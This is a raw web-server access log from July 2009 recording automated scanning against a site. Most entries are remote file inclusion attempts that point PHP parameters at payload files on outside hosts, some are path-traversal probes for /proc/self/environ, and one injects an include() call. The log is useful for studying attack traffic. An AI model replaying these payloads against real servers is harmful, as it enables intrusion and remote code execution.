217.30.180.2 - - [16/Jul/2009:03:50:18 -0400] "GET /logs/access_log.Q109060700/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
222.122.6.62 - - [16/Jul/2009:03:50:34 -0400] "GET /logs/index2.php?page=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
222.122.6.62 - - [16/Jul/2009:03:50:34 -0400] "GET /index2.php?page=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
222.122.6.62 - - [16/Jul/2009:03:50:34 -0400] "GET /logs/error_log.Q109062400%20/index2.php?page=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
211.43.202.66 - - [16/Jul/2009:03:50:58 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
211.43.202.66 - - [16/Jul/2009:03:50:58 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
66.235.124.7 - - [16/Jul/2009:03:50:58 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
222.122.6.62 - - [16/Jul/2009:03:51:05 -0400] "GET /logs/access_log.Q109062400%20/index2.php?page=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
209.59.12.99 - - [16/Jul/2009:03:51:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.235.124.7 - - [16/Jul/2009:03:51:29 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02 HTTP/1.1" 200 65457 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
217.30.180.2 - - [16/Jul/2009:03:51:31 -0400] "GET /logs/error_log.Q109060700/http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.236.242.164 - - [16/Jul/2009:03:53:01 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:53:01 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.6.62 - - [16/Jul/2009:03:53:01 -0400] "GET /logs/access_log.Q109051300%20/index2.php?page=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
211.236.242.164 - - [16/Jul/2009:03:53:01 -0400] "GET /logs/access_log.Q109061900//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.23.158.226 - - [16/Jul/2009:03:53:25 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [16/Jul/2009:03:53:25 -0400] "GET /logs/access_log.Q109061900//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [16/Jul/2009:03:53:25 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.114.133.165 - - [16/Jul/2009:03:53:29 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.114.133.165 - - [16/Jul/2009:03:53:29 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.114.133.165 - - [16/Jul/2009:03:53:29 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:03:55:08 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:03:55:08 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:03:55:08 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:03:55:14 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:03:55:15 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:03:55:15 -0400] "GET /logs/access_log.Q109062300/lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.23.158.226 - - [16/Jul/2009:03:55:37 -0400] "GET /logs/access_log.Q109061600//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.236.242.164 - - [16/Jul/2009:03:55:49 -0400] "GET /logs/access_log.Q109061600//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.236.242.164 - - [16/Jul/2009:03:55:54 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:03:56:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [16/Jul/2009:03:56:22 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.30.180.2 - - [16/Jul/2009:03:56:44 -0400] "GET /logs/error_log.Q109060700/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
79.174.68.88 - - [16/Jul/2009:03:56:53 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
79.174.68.88 - - [16/Jul/2009:03:56:55 -0400] "GET /logs/access_log.Q109062300%20%20/lostpasswd.php?env[include_prefix]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:57:46 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.822"
76.12.17.218 - - [16/Jul/2009:03:57:46 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 300 "-" "libwww-perl/5.822"
76.12.17.218 - - [16/Jul/2009:03:57:46 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.822"
76.12.17.218 - - [16/Jul/2009:03:57:46 -0400] "GET /logs/access_log.Q109062600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt??? HTTP/1.1" 404 300 "-" "libwww-perl/5.822"
76.12.17.218 - - [16/Jul/2009:03:57:48 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:57:48 -0400] "GET /logs/access_log.Q109062800%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:57:48 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:03:57:54 -0400] "GET /logs/access_log.Q109062600%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
193.151.16.53 - - [16/Jul/2009:03:58:33 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 278 "-" "libwww-perl/5.825"
193.151.16.53 - - [16/Jul/2009:03:58:33 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.825"
193.151.16.53 - - [16/Jul/2009:03:58:33 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 300 "-" "libwww-perl/5.825"
193.151.16.53 - - [16/Jul/2009:03:58:33 -0400] "GET /logs/error_log.Q109062600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/yes.txt?%0D?? HTTP/1.1" 404 299 "-" "libwww-perl/5.825"
67.18.63.194 - - [16/Jul/2009:03:59:47 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:03:59:47 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:03:59:47 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:03:59:53 -0400] "GET /logs/access_log.Q109062600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
89.191.11.195 - - [16/Jul/2009:04:00:17 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
89.191.11.195 - - [16/Jul/2009:04:00:17 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
89.191.11.195 - - [16/Jul/2009:04:00:17 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /logs/access_log.Q109052800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 244 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:04:00:18 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
76.12.17.218 - - [16/Jul/2009:04:00:43 -0400] "GET /logs/access_log.Q109062800//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:00:48 -0400] "GET /logs/access_log.Q109062600//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:01:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.18.63.194 - - [16/Jul/2009:04:02:12 -0400] "GET /logs/access_log.Q109062800%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:02:17 -0400] "GET /logs/access_log.Q109062600%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
89.191.11.195 - - [16/Jul/2009:04:02:26 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
89.191.11.195 - - [16/Jul/2009:04:02:27 -0400] "GET /logs/access_log.Q109052600/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
89.191.11.195 - - [16/Jul/2009:04:02:27 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
89.191.11.195 - - [16/Jul/2009:04:02:27 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
76.12.17.218 - - [16/Jul/2009:04:03:03 -0400] "GET /logs/access_log.Q109061100%20%20/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:03:03 -0400] "GET /logs/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:03:03 -0400] "GET /lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:03:03 -0400] "GET /lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:03:04 -0400] "GET /logs/access_log.Q109061100%20%20/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:03:04 -0400] "GET /logs/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:03:13 -0400] "GET /logs/access_log.Q109070800%20%20/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:03:14 -0400] "GET /logs/access_log.Q109070800%20%20/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:03:20 -0400] "GET /logs/access_log.Q109061100%20%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:03:20 -0400] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:03:20 -0400] "GET /logs/access_log.Q109061500%20%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:03:21 -0400] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:04:41 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:04:41 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:04:41 -0400] "GET /logs/access_log.Q109063000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:04:56 -0400] "GET /lostpasswd.php/poll/png.php?include_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:04:56 -0400] "GET /logs/access_log.Q109061100%20%20/lostpasswd.php/poll/png.php?include_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:04:57 -0400] "GET /logs/lostpasswd.php/poll/png.php?include_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:05:03 -0400] "GET /logs/access_log.Q109070800%20%20/lostpasswd.php/poll/png.php?include_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:05:14 -0400] "GET /logs/access_log.Q109061500/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
78.110.50.132 - - [16/Jul/2009:04:05:14 -0400] "GET /logs/access_log.Q109061100/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.trador.nl/language/id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:05:18 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:05:18 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:05:18 -0400] "GET /logs/access_log.Q109063000%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:06:01 -0400] "GET /logs/access_log.Q109061100/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:06:01 -0400] "GET /logs/access_log.Q109052800/lostpasswd.php/poll/png.php?include_path=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:04:06:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.114.133.165 - - [16/Jul/2009:04:06:27 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:06:41 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:06:41 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:06:41 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:06:52 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:06:52 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:04:06:52 -0400] "GET /logs/access_log.Q109063000//include/print_category.php?setup[use_category]=1&dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:07:02 -0400] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:07:02 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:07:02 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
76.12.17.218 - - [16/Jul/2009:04:07:59 -0400] "GET /logs/access_log.Q109052600%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.sven-downunder.de/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:08:18 -0400] "GET /logs/access_log.Q109061100/lostpasswd.php/poll/png.php?include_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.18.63.194 - - [16/Jul/2009:04:08:19 -0400] "GET /logs/access_log.Q109052800/lostpasswd.php/poll/png.php?include_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [16/Jul/2009:04:08:29 -0400] "GET /phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:04:08:29 -0400] "GET /logs/access_log.Q109071100/phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:04:08:29 -0400] "GET /logs/phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:04:08:30 -0400] "GET /logs/access_log.Q109071100/phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:04:08:30 -0400] "GET /phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:04:08:30 -0400] "GET /logs/phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:04:08:49 -0400] "GET /logs/access_log.Q109061800/phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
61.78.62.84 - - [16/Jul/2009:04:08:58 -0400] "GET /logs/access_log.Q109061800/phpshop/index.php?base_dir=http://anansi.pl/perkosa.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
